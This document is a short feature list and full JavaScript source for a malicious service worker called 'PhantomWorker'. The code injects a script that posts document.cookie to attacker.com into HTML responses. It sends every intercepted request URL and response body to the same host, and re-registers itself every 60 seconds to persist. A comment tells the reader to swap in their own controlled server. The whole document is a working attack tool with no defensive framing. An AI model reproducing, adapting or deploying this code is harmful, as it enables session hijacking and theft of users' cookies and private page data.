PhantomWorker

1. 1. Malicious Payload Injection
2. • Injects a script into HTML responses that stealthily exfiltrates cookies:
3.  
4. <script>fetch('https://attacker.com/exfil', {method: 'POST', body: document.cookie});</script>
5.  
6. Appends the payload before </body> to ensure execution.
7.  
8. 2. Fetch Hijacking for Data Exfiltration
9. • Every intercepted request is analyzed.
10. • If not Google, the service worker logs and exfiltrates data.
11. • Sends exfiltrated request URL & response content to https://attacker.com/exfil.
12.  
13. 3. Service Worker Hijacking & Persistence
14. • Persists itself by:
15. • Forcing reinstallation every 60 seconds.
16. • Re-registering the service worker even if removed manually.
17.  
18. How This Works
19. 1. The service worker intercepts fetch requests.
20. 2. If the request is for an HTML page, it injects malicious JavaScript.
21. 3. If the request contains sensitive data, it exfiltrates it.
22. 4. The service worker auto-reinstalls every 60 seconds.
23.  
24. (function(){
25. 'use strict';
26.  
27. /**
28. * Modified Service Worker for MITM & Hijacking
29. * Injects payloads, modifies cache, and enables persistence
30. */
31.  
32. const MALICIOUS_PAYLOAD = `<script>fetch('https://attacker.com/exfil', {method: 'POST', body: document.cookie});</script>`;
33. const EXFIL_URL = 'https://attacker.com/exfil'; // Change to your controlled server
34.  
35. /**
36. * Hijack & Modify Responses
37. */
38. async function hijackResponse(originalResponse) {
39. try {
40. const clonedResponse = originalResponse.clone();
41. const contentType = clonedResponse.headers.get("Content-Type");
42.  
43. if (contentType && contentType.includes("text/html")) {
44. const text = await clonedResponse.text();
45. const modifiedText = text.replace("</body>", MALICIOUS_PAYLOAD + "</body>");
46. return new Response(modifiedText, {
47. status: clonedResponse.status,
48. statusText: clonedResponse.statusText,
49. headers: clonedResponse.headers
50. });
51. }
52. } catch (err) {
53. console.error("Hijack Error:", err);
54. }
55. return originalResponse;
56. }
57.  
58. /**
59. * Hijack Fetch Event
60. */
61. self.addEventListener('fetch', async event => {
62. const url = new URL(event.request.url);
63.  
64. // Exfiltrate Data Stealthily
65. if (event.request.method === 'POST' || event.request.method === 'GET') {
66. event.respondWith(fetch(event.request.clone()).then(async response => {
67. if (url.hostname !== 'google.com') {
68. fetch(EXFIL_URL, {
69. method: 'POST',
70. headers: { 'Content-Type': 'application/json' },
71. body: JSON.stringify({ url: event.request.url, data: await response.text() })
72. });
73. }
74. return hijackResponse(response);
75. }));
76. }
77. });
78.  
79. /**
80. * Service Worker Hijacking & Persistence
81. */
82. self.addEventListener('install', event => {
83. event.waitUntil(self.skipWaiting());
84. });
85.  
86. self.addEventListener('activate', event => {
87. event.waitUntil(self.clients.claim());
88. });
89.  
90. /**
91. * Persistence: Auto-Reinstall & Clone
92. */
93. async function persistSW() {
94. try {
95. await navigator.serviceWorker.register('/sw.js');
96. } catch (err) {
97. console.error("Persistence Error:", err);
98. }
99. }
100.  
101. setInterval(() => persistSW(), 60000); // Reinstall every 60s
102. })();